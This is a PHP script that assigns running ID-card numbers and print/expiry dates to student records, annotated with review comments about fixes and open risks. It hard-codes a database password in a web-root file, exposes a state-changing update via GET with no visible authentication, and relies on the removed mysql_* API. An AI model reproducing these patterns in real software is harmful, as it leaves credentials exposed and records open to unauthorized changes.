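<?php
/**
 * Batch-assigns running card numbers to student ID-card records.
 *
 * Request parameters (read from $_REQUEST):
 *   years_c        - entry academic year, matched against tblstd_idcard.start_year
 *   level          - 1 or 2; selects students whose student_id has '2' or '3'
 *                    as its third character
 *   d,  m,  y      - print date parts, stored as "d/m/y"
 *   d2, m2, y2     - expiry date parts, stored as "d2/m2/y2"
 *
 * For every matching row whose card_no is 0, the next number after the current
 * max(card_no) of that start year is written together with both dates, and one
 * HTML line per student is printed.
 *
 * NOTE(review): no authentication or CSRF check is visible in this file, and the
 * update is reachable through $_REQUEST (so also via GET) - confirm that access
 * control is enforced before this script runs.
 * NOTE(review): ext/mysql (mysql_*) is deprecated in PHP 5.5 and removed in PHP 7;
 * migrate to mysqli or PDO prepared statements when the runtime is upgraded.
 */

// NOTE(review): database credentials are hard-coded in a file under the document
// root. Move them to configuration outside the web root and rotate the password
// if this source has ever been readable by a third party.
$host = "localhost";
$user_name = "stdcard_db";
$pass_word = "Stdcard123";
$db = "stdcard_db";

// '@' is kept on the two connection calls so that driver warnings (which can
// include the account name) are never rendered; failures are handled explicitly.
$link = @mysql_connect($host, $user_name, $pass_word);
if ($link === false) {
    die("can not connect to server");
}
// mysql_set_charset() also informs the client library of the charset, which
// mysql_real_escape_string() relies on; a plain "SET NAMES" query does not.
mysql_set_charset('utf8', $link);
if (!@mysql_select_db($db, $link)) {
    die("can not select database");
}

// Collect the request values. Missing keys and non-string values (for example
// level[]=1) are treated as empty so they fail the required-field check below.
$fields = array('years_c', 'level', 'd', 'm', 'y', 'd2', 'm2', 'y2');
$in = array();
foreach ($fields as $key) {
    $value = isset($_REQUEST[$key]) ? $_REQUEST[$key] : '';
    $in[$key] = is_string($value) ? $value : '';
}

// Message text: "Please fill in the entry academic year, the education level,
// or the day/month/year".
$msg_required = "กรุณากรอกปีการศึกษาที่เข้า หรือ ระดับการศึกษา หรือ วัน/เดือน/ปี";

foreach ($in as $value) {
    if ($value === '') {
        echo $msg_required;
        exit();
    }
}

// Only levels 1 and 2 map to a student_id digit; anything else previously fell
// through with an undefined query string.
if ($in['level'] == 1) {
    $level_digit = '2';
} elseif ($in['level'] == 2) {
    $level_digit = '3';
} else {
    echo $msg_required;
    exit();
}

// Single-character months are zero-padded.
$m = (strlen($in['m']) == 1) ? "0" . $in['m'] : $in['m'];
$m2 = (strlen($in['m2']) == 1) ? "0" . $in['m2'] : $in['m2'];

$date_print = $in['d'] . "/" . $m . "/" . $in['y'];
$date_expire = $in['d2'] . "/" . $m2 . "/" . $in['y2'];

// Every request-derived value is escaped before it is placed inside a quoted
// SQL literal.
$years_sql = mysql_real_escape_string($in['years_c'], $link);
$date_print_sql = mysql_real_escape_string($date_print, $link);
$date_expire_sql = mysql_real_escape_string($date_expire, $link);

// NOTE(review): max(card_no) is read once and incremented locally; two
// concurrent runs for the same year could hand out the same numbers. Consider a
// table lock or a unique index on (start_year, card_no).
$sql_max = "select max(card_no) from tblstd_idcard  where start_year = '$years_sql' ";
$result_max = mysql_query($sql_max, $link);
if ($result_max === false) {
    die("query failed");
}
$rs_max = mysql_fetch_array($result_max);
// max() yields NULL when no row matches; start counting from 0 in that case.
$card_no_max = ($rs_max !== false) ? (int) $rs_max[0] : 0;

$sql_process = "select * from tblstd_idcard  where start_year = '$years_sql' and substr(student_id,3,1)='$level_digit' order by group_id,student_id";
// The generated SQL is no longer echoed to the browser: it was debug output
// that disclosed table and column names to whoever could reach this page.
$result_std = mysql_query($sql_process, $link);
if ($result_std === false) {
    die("query failed");
}

$n = 0;
while ($rs_std = mysql_fetch_array($result_std)) {
    $n++;
    $student_id = $rs_std['student_id'];
    $stu_fname = $rs_std['stu_fname'];
    // The original read 'stu_fname' for the last name as well, which looks like
    // a copy-paste slip. NOTE(review): 'stu_lname' is presumed to be the column
    // name - confirm against the table; the old value is used if it is absent.
    $stu_lname = isset($rs_std['stu_lname']) ? $rs_std['stu_lname'] : $rs_std['stu_fname'];
    $card_no = $rs_std['card_no'];

    if ($card_no == 0) {
        $card_no_max++;
        $card_no = $card_no_max;

        // student_id comes from the database, but is escaped as well so stored
        // data cannot alter the statement.
        $student_id_sql = mysql_real_escape_string($student_id, $link);
        $sql_upd = "update tblstd_idcard set card_no = '$card_no', date_print = '$date_print_sql', date_expire='$date_expire_sql' where student_id = '$student_id_sql' ";
        if (mysql_query($sql_upd, $link) === false) {
            // Stop rather than report a number that was not stored.
            die("query failed");
        }
    }

    // The original printed the undefined $card_no_show; $card_no is the value
    // that was assigned or already stored. All fields are HTML-escaped because
    // they originate from the request or from stored records.
    $cells = array($n, $student_id, $stu_fname . " " . $stu_lname, $card_no, $date_print, $date_expire);
    foreach ($cells as $i => $cell) {
        $cells[$i] = htmlspecialchars((string) $cell, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
    echo implode("=>", $cells) . "<br>";
} // end while
?>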
